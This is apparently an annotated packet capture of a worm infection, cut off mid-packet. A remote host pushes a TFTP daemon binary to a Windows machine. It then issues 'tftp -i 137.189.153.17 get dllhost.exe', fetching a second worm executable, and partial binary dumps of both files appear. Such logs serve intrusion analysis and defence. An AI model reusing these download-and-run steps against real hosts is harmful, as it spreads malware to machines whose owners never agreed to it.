=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.395056 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40836 IpLen:20 DgmLen:544 Len: 516 ............ ....@ .......`.=....j...f.F8f......P..f.F:.D$..p .F <P..,.....................u..5.........0..,...3........ ...j.X_^ ...V..`..V..X......`..V.D$....@..`...A...`....L...j.X^...S..X... VW..`..W....`....`..;.t..P..p.;T$.t.....V..W..L.......W..L...3._ ^[...V.t$..F ...t.P..............t.j.P.5.`....X...j.........h... ........T...V..(...^...V.t$...,......t.P......YV......Y^......V. t$...t3V.x....F$Ht!Ht.Ht.Hu.V.......V.......V.......V.....^...S. .X...Vh.`.....5.`.....`..tQWU.~.W.......................Wr...... v... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.396587 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:120 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.397545 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40837 IpLen:20 DgmLen:544 Len: 516 .....p.f.G*P......W.f.......L......`....u.]_h.`....L........^[.. .U.....SVW.u..g.....3.;.........................v .E.P..$...f.F* P......f.F:P.......F(j.PS.. ....F8P.v ..0......u................ ...;.......9.(...u.................'....;.v.........PPW.5.`....T ...;.tI..8....A;.tHh....S.v .F(SP.................;.t.SP.5.`.... X...............;.t.V..L..._^[....QS......UV.t$.W.|$.3.......j.. l$..G ..f9G4u.f......P..f9G6u........j.].(f.G6P..f.G4P......j... f9G4u.f......fHP............0....t=..............t.j.P.5.`....X. ...' =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.398008 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:121 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.398942 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40838 IpLen:20 DgmLen:544 Len: 516 ...............V..L...3._^][Y...f......WV.......3.;.u.f.G.P....9 .(...............u.................;.t.......PPQ.5.`....T....... ..;G s.f.G.P....0..........l$.....i...f.G.P.....j.Wj... ....F8P. v ..0........>...........t.V..L...j.X.....U..Q.e..S......V.u.W.} .j........G ..f9G4u*f......f@P..f9G6u.f......3..E............cj. ..f9G4uWf......P..f9G6uG......j...f.F8f......P.....j.f.F:Wj..F8j .P.v ..0........#..............3.9].tB.E.P.G,..0......P.G8P..,.. ..x...9]..E.t.;.})Sj..w..........PW.&...;.t.V..L...j.X......G,.. .;G =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.400548 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:122 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.401515 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40839 IpLen:20 DgmLen:544 Len: 516 ................j...f.F8f......P..f.F:.G.j.3.PS.F8j.P.v ..0....E .......;.t-9.(.........u.................QQP.5.`....T....}..u... .....G,...;G s(......;.t.SP.5.`....X...................V..L...3. _^[....3....V.t$..v........t1.H$It$It.It.Iu"VP.......VP.......VP .......VP.T...^...3.9D$.v..L$..<..t.@;D$.r.3....j.X..U....(S.e.. .e..V.u.Wh.....^6S.]...................3.h4.......I.D...E....... ..Y..........@..3......v... ....E.f.F.P.......}..}.....t....P..P ......G.GY..u..}..}..P.......:.u...t..W...:P.u.GG@@..u.3........ ..t7 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.401967 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:123 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.405148 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40840 IpLen:20 DgmLen:544 Len: 516 .....}..H.......:.u...t..W...:P.u.GG@@..u.3.................}... .3...........+.R.......U....................u.h4....Z.u.h.\...X. ....u..u.h ]...G.....t..u.hX]...6.....u.......j.j..Ph.^..h.....u ..{.....u.h ...j..1h.....u.......Y...Y..,...u,.5.......0..,..... j.j..E..p..........QP......=....j.j.P...u.......t.j.j..F$..,.... .......u..=.........0..,....>j.j.j...,.........}.t".F.f.e...E..E .j.PWf.E.....$.....t.......h....j..W...S.~...D....{ ....{(.u.... .3.WWWW..@...;.......t.j.P.u......;.......u...8...........S..... j.^. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.406698 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:124 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.407633 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40841 IpLen:20 DgmLen:544 Len: 516 ....u..u........;.........(....C8WP..$....u.P.E.V.u.@PV......... ....9.t..F(i.............................j.PP.s ......h=*..P.5.` ....x...j._.{$.F VS......f.......@...j.3..u.;.......Q.. ...t .C8 P.u...0.........;N s...0...........V.u...0......u$........j.j..v ..........PV........]...t..}..t.S..L....}..u.S......Y_^3.[....U. ...(.e...e..SVWh4...........Y..........@..3...h.......E..p6V.u.. .................3....}....w.I.t1... ....E.f.G.P.......>....}.t% ...P..L........Yt.P..P...Y..G.?.u..}..P.........:.u...t..W...:P. u.GG =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.408099 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:125 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.409047 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40842 IpLen:20 DgmLen:544 Len: 516 ....@@..u.3..........u...0....@...>.H.......:.u...t..N...:O.u.FF GG..u.3..................0........E..}..........3.....+.R....... U....................u.h4....E.u.h ].../.......=....u.h.]....... ....(...h.^..h.....u..g.....u.h ...j......h....h.....u.......... .....,...u..5.........0..,........3.Vj.j...,.........}.u.......h ....V.....f.u..u.j.f.E....F..E..E.PW..$.....t ......h....j..v... .......PV.......(....~.P.C8P..$...P.E.@j.PV.,.......^...S..D.... { ....{(.u.....3.VVVV..@...;.......t.j._WP.u......;.......u...8. .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.410576 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:126 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.411627 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40843 IpLen:20 DgmLen:544 Len: 516 ..........S.s....u..E............;.......3..E.....9.(...t..E..@( i.............................VPP.s ......h=*..P.5.`....x....E.. .$....{$;..@ ........$...t... ....0.$.5....j._W..f.C8f......P..f .C:.. ...j..C8.u.j... ...P.u...0......u........&......j.j...j.j. .E..p..........QP.......t..}..t.S..L....}..u.S......Y_^3.[....U. ..p.........}.....VWu..u..u..8.U.3.3.9M.~*.}..?.u..<..u..'...... ..5....F<.u...A;M.|.VR.u...............u..5.........0..,....._^. ...U......E.S3.Ph?...Sh....h.....].......;.t...8...3......8..^.. WV.5 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.412084 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:127 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.413083 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40844 IpLen:20 DgmLen:544 Len: 516 ........u6.E..E.....P.E.h.^..PShH....u...;.t...8.....j.X9E.u..E. j2.E._P.E.h.\..PSh.....u..}...;.t...8......}..u..E..E..}.P.E.h ] ..PSh.....u...;.t...8......}..u..E..E..}.P.E.hX]..PSh.....u...;. t...8......}..u..E..E..}.P.E.h.]..PSh\....u...;.t...8......}..u. .E..u........E.^_[.........=.^...SUVW.......^..u.Uh....S..H..... ..D$.UPS.. .....u.jW.x...t$.............3..............I...^../. ..^..u...\.8\t,;.s(.\.....3.....+.............O................3 .j.....I..._..X_^][.......U..V.u.W....tJ<*t.<?t..M.:.u2AQ...E..8 .t&@ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.414628 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:128 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.415556 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40845 IpLen:20 DgmLen:544 Len: 516 ....PF...}..F.WP.......u.8.t.GWV.......u.3...j.X...M.3.8...._^]. ...%l....%8....%<...U..j.h`...h.;..d.....Pd.%.......SVW.e..E.... .j.............b.........b...............`.............`........ ......b.........]....u.h.;................h.P..h.P.............` ...U..E.P...`..Q.U.R.E.P.M.Q.........h.P..h.P...v.............U. ...E.P.M.Q.U.R.!.......E.P.......".E......M.PQ.1........e..U.R.. ........E......M.d......_^[..].......%.....%|.......h....h.....7 ....................3................................%.....%.... |=.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.416020 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:129 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.416948 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40846 IpLen:20 DgmLen:544 Len: 516 ............`>.......<...........@.......<...........@.......=.. ........rA..D....=...........A..8....=...........B..|........... .............@.. @..~@..p@..R@..>@......l>...?...?...?...?...?.. .?..z>...>...>...>...>...>...>...>...?..$?..<?..V?..b?..p?..x?.. .?.......B..rB...B..0B..&B...B...B...B...B...A...A...A...A...A.. .A...A...C...B...B...B...B...B...A..bB..TB..LB..:B..BB...A...... R>..o...s....>.......>......4>......B>..............7........... ....|A...A......&A..hA..^A..TA..BA..0A...A...A...A...@...@...@.. .@.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.417225 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:40848 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x6725DCEC Ack: 0x7339CCE7 Win: 0xFDFD TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.417567 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:130 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.418761 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40850 IpLen:20 DgmLen:544 Len: 516 .....@........WSAEventSelect....WSAGetOverlappedResult..2.WSARec vFrom...WSACloseEvent.=.WSASocketA..WS2_32.dll....ExitProcess.-. GetLastError....WaitForSingleObject.4.CreateEventA....Initialize CriticalSection...HeapCreate....LeaveCriticalSection....HeapFree ....CloseHandle.o.EnterCriticalSection....InterlockedIncrement.. ..WaitForMultipleObjects....HeapAlloc.R.ResetEvent....Sleep...Tr yEnterCriticalSection...SuspendThread.T.ResumeThread....SetEvent ....SetLastError..Z.DeleteCriticalSection./.GetLocalTime....Expa ndEn =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.420303 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:131 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.421315 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40852 IpLen:20 DgmLen:544 Len: 516 ....vironmentStringsA.KERNEL32.dll....StartServiceCtrlDispatcher A...SetServiceStatus....RegisterServiceCtrlHandlerA...RegCloseKe y...RegQueryValueExA....RegOpenKeyExA.ADVAPI32.dll..P.RtlRegiste rWait...RtlCreateTimer....RtlCreateTimerQueue..._chkstk...RtlDer egisterWaitEx.3._itoa.P.atoi..=._stricmp..m.memmove...RtlDeleteT imer....RtlUpdateTimer....tolower._.isupper.}.strncpy.ntdll.dll. O.NotifyAddrChange..".GetIpAddrTable..iphlpapi.dll..F.exit....pr intf..C.ctime.T.fopen..._mkdir...._errno...._chdir....time..[.fr ee.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.422849 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:132 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.423805 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40853 IpLen:20 DgmLen:544 Len: 516 ....I.fclose....realloc...malloc...._read..._close..A._lseek.... _open..._write...._exit.H._XcptFilter.c.__p___initenv.X.__getmai nargs..._initterm...__setusermatherr...._adjust_fdiv..i.__p__com mode..n.__p__fmode....__set_app_type...._except_handler3..MSVCRT .dll...._controlfp.............................................. ................................................................ ................................................................ ................................................................ .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.424293 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:133 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.427653 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40854 IpLen:20 DgmLen:544 Len: 516 .................... =========================================== ============================= .Abstract: . This implements an RF C 783 tftp daemon. . It listens on port 69 for requests . and spawns a thread to process each request. . .TFTPD USAGE and Installation: =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.429188 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:134 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.430934 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40855 IpLen:20 DgmLen:544 Len: 516 .... . . md d:/tftpd (the StartDirectory). . copy // MohsinA_p90/test/tftpd.exe . . sc create tftpd binPath= d:/tftpd/tftpd.exe (give full p ath). . sc query tftpd ( check if installed). . .Start: =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.431397 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:135 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.432355 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40856 IpLen:20 DgmLen:544 Len: 516 ... . sc start tftpd -f (creates a log file). .or sc start tftpd .or net start tftpd .or sc start tftpd [-dStartDirectory] [-e] [-f] . Options: -e use event log. . -f log to fil e. . -dS tart =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.433901 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:136 IpLen:20 DgmLen:32 Len: 4 ... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.434830 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40857 IpLen:20 DgmLen:544 Len: 516 ...!Directory .Info: . sc interrogate tftpd (logs will be updated). . sc query tftpd Check whether running. .Stop: . sc stop tftpd . net stop tft pd . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.435285 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:137 IpLen:20 DgmLen:32 Len: 4 ...! =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.436228 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40858 IpLen:20 DgmLen:544 Len: 516 ..." .Variables that control what files can be read/written an d by whom: . StartDirectory - only files there will be accessible. . LogFile is cre ated here. . ValidClients - Clien ts matching this ip address can read files. . eg. you can set it to "157.55.8?.*" . ValidMasters - clients matching this can write and read files. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.437836 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:138 IpLen:20 DgmLen:32 Len: 4 ..." =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.438874 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40859 IpLen:20 DgmLen:544 Len: 516 ...# . eg. you can set it to "" and no one can write. . ValidReadFiles - only matching files will be served out, eg. "r*.t?t". ValidWriteFiles- only matching file s will be accepted, eg. "w*.txt" . .Client: . tftp [-i] servername {get|put} src_file dest_file . -i from binary mode, else ascii mode is used. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.439342 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:139 IpLen:20 DgmLen:32 Len: 4 ...# =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.440262 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40860 IpLen:20 DgmLen:544 Len: 516 ...$ . . ===================================== =================================== ........Tftpd....\..e....... ....................x...d...P...@...$.......*................... ....................................*........................... ............................*................................... ....................*........................................... ................................................................ .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.441798 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:140 IpLen:20 DgmLen:32 Len: 4 ...$ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.443573 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40861 IpLen:20 DgmLen:544 Len: 516 ...%............................................0............... ........H...`p..t...................t.4...V.S._.V.E.R.S.I.O.N._. I.N.F.O...................V.......V.?........................... ......S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.4.0.9.0.4.B.0...L... ..C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t. i.o.n...r.%...F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....T.C.P./.I.P. .T. r.i.v.i.a.l. .f.i.l.e. .t.r.a.n.s.f.e.r. .d.a.e.m.o.n.......8... ..F.i.l.e.V.e.r.s.i.o.n.....5...0.0...2.1.3.4...1...4.....I.n.t. e.r. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.444052 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:141 IpLen:20 DgmLen:32 Len: 4 ...% =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.448247 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40862 IpLen:20 DgmLen:544 Len: 516 ...&n.a.l.N.a.m.e...t.f.t.p.d...e.x.e...t.(...L.e.g.a.l.C.o.p.y. r.i.g.h.t...C.o.p.y.r.i.g.h.t. .(.C.). .M.i.c.r.o.s.o.f.t. .C.o. r.p... .1.9.8.1.-.1.9.9.9...<.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m. e...t.f.t.p.d...e.x.e...~./...P.r.o.d.u.c.t.N.a.m.e.....M.i.c.r. o.s.o.f.t.(.R.). .W.i.n.d.o.w.s. .(.R.). .2.0.0.0. .O.p.e.r.a.t. i.n.g. .S.y.s.t.e.m.....<.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...5... 0.0...2.1.3.4...1...D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a. n.s.l.a.t.i.o.n................................................. .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.449783 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:142 IpLen:20 DgmLen:32 Len: 4 ...& =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.450551 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40863 IpLen:20 DgmLen:304 Len: 276 ...'............exe\tftpd.dbg..exe.............................. ................................................................ ................................................................ ................................................................ .................... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.450939 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:143 IpLen:20 DgmLen:32 Len: 4 ...' =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.479733 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:144 IpLen:20 DgmLen:102 DF ***AP*** Seq: 0x7339CCE7 Ack: 0x6725DCEC Win: 0xFA89 TcpLen: 20 Transfer successful: 19728 bytes in 1 second, 19728 bytes/s... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Download another worm program DLLHOST.EXE 08/19-15:17:10.480328 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:40864 IpLen:20 DgmLen:97 DF ***AP*** Seq: 0x6725DCEC Ack: 0x7339CD25 Win: 0xFDBF TcpLen: 20 tftp -i 137.189.153.17 get dllhost.exe wins\DLLHOST.EXE.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.487221 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:145 IpLen:20 DgmLen:42 DF ***AP*** Seq: 0x7339CD25 Ack: 0x6725DD25 Win: 0xFA50 TcpLen: 20 .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.516860 192.168.20.2:1033 -> 137.189.153.17:69 UDP TTL:128 TOS:0x0 ID:146 IpLen:20 DgmLen:48 Len: 20 ..dllhost.exe.octet. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.609579 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40872 IpLen:20 DgmLen:544 Len: 516 ....MZ......................@................................... ............!..L.!This program cannot be run in DOS mode....$... ....V^%..?KN.?KN.?KNK.XN.?KN.7.N.?KNi#GN.?KN} AN.?KN.#EN.?KN} ON .?KN.?JNv?KN..@N.?KNRich.?KN........PE..L.... .................. .0.......`..`....p........@..................................... ................................................................ ................................................................ .....................................`.......................... .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.610213 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:147 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.612204 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40873 IpLen:20 DgmLen:544 Len: 516 .............0...p..."..................@....................... .&..............@............................................... ................................................................ ................................................................ ................................................................ .........0...UVW.A..3...$5....$....4........@(...........+..D$.. ..................>...P...I:|$.7j..?.}..!0.....ty.L59(SQW.....*. .t[.5 A@J-@..T$0j.R..fn........I.<0PQ.7!....(\.;.....v..R ...p.. &... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.613809 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:148 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.614869 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40874 IpLen:20 DgmLen:544 Len: 